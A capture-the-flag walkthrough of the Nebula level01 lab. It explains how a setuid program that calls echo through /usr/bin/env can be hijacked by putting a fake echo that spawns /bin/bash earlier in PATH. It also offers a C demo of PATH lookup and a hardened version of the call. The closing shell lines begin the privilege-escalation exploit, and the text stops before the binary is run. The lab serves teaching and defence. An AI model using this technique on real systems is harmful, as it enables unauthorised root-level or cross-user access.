Exploit-Exercises Nebula level01
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.
level1.c

    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <sys/types.h>
    #include <stdio.h>

    int main(int argc, char **argv, char **envp)
    {
        gid_t gid;
        uid_t uid;

        /* Take the effective IDs granted by the setuid/setgid bits ... */
        gid = getegid();
        uid = geteuid();

        /* ... and make them the real and saved IDs as well, so the
         * privilege is inherited by any process spawned below. */
        setresgid(gid, gid, gid);
        setresuid(uid, uid, uid);

        /* "echo" is resolved by env through the caller's PATH, not by an
         * absolute path. This is the bug the level is about. */
        system("/usr/bin/env echo and now what?");
    }
Let's take a quick look at the code. setresgid() and setresuid() set the real, effective and saved group/user ID of the calling process. Notice that the binary has the setuid bit set (the s in the permission string), as shown below.
level00@nebula~$ ls -l /home/flag01
total 8
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
Therefore setresuid(uid, uid, uid) sets the real, effective and saved user ID to flag01, the owner of the binary.
Also note that echo is normally a shell builtin or the fixed binary /bin/echo. Because this program invokes it through /usr/bin/env, env looks the command up in the directories listed in the PATH environment variable, so we can use this to our advantage by placing our own echo earlier in PATH. This fake echo file spawns a new shell, which inherits the user IDs that setresuid() just set.
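To make the mechanism concrete, here is an added C example (not the level's code and not part of Exploit-Exercises). first_match() mimics the lookup env performs, walking PATH left to right with an injectable existence check, so a constructed PATH can be fed in without touching the real filesystem; run_echo_hardened() shows what the program should have done instead: an absolute path, a fixed environment and no shell. The paths /tmp/untrusted/echo and /bin/echo and all function names are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Walk PATH the way env/execvp do: split on ':' and return the first
 * directory that holds an executable named cmd.  `exists` stands in for
 * access(candidate, X_OK) so the demo is deterministic.  Returns 1 and
 * fills `out` on a hit, 0 if nothing matched. */
int first_match(const char *path, const char *cmd,
                int (*exists)(const char *), char *out, size_t outlen)
{
    const char *p = path;
    while (*p) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        char candidate[4096];

        if (len == 0) {
            /* An empty PATH element means the current directory. */
            snprintf(candidate, sizeof candidate, "./%s", cmd);
        } else if (len + 1 + strlen(cmd) < sizeof candidate) {
            snprintf(candidate, sizeof candidate, "%.*s/%s", (int)len, p, cmd);
        } else {
            candidate[0] = '\0';            /* element too long, skip it */
        }

        if (candidate[0] && exists(candidate)) {
            snprintf(out, outlen, "%s", candidate);
            return 1;
        }
        if (!colon)
            break;
        p = colon + 1;
    }
    return 0;
}

/* Constructed stand-in for the filesystem (assumption, not real data):
 * only these two paths "exist". */
static int fake_exists(const char *p)
{
    return strcmp(p, "/tmp/untrusted/echo") == 0 ||
           strcmp(p, "/bin/echo") == 0;
}

/* Resolves "echo" under two constructed PATH values: one where a
 * user-writable directory comes first, one with only system dirs. */
int demo(char *winner, size_t n, int untrusted_first)
{
    const char *path = untrusted_first ? "/tmp/untrusted:/usr/bin:/bin"
                                       : "/usr/bin:/bin";
    return first_match(path, "echo", fake_exists, winner, n);
}

/* Hardened replacement for system("/usr/bin/env echo ..."): absolute
 * path, a fixed environment (the caller's PATH is discarded) and no
 * shell in between.  Returns the child's exit status, or -1 on error. */
int run_echo_hardened(const char *message)
{
    char *const argv[] = { "/bin/echo", (char *)message, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);
        _exit(127);                      /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char winner[256];
    demo(winner, sizeof winner, 1);
    printf("untrusted dir first: env would run %s\n", winner);
    demo(winner, sizeof winner, 0);
    printf("system dirs only:    env would run %s\n", winner);
    return run_echo_hardened("and now what?") == 0 ? 0 : 1;
}
```

The point the two PATH values make is that env trusts whatever order the caller's environment supplies; a setuid program that wants the real echo has to name it by absolute path and supply its own environment, as run_echo_hardened() does.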
level00@nebula~$ echo "/bin/bash" > echo
level00@nebula~$ chmod +x echo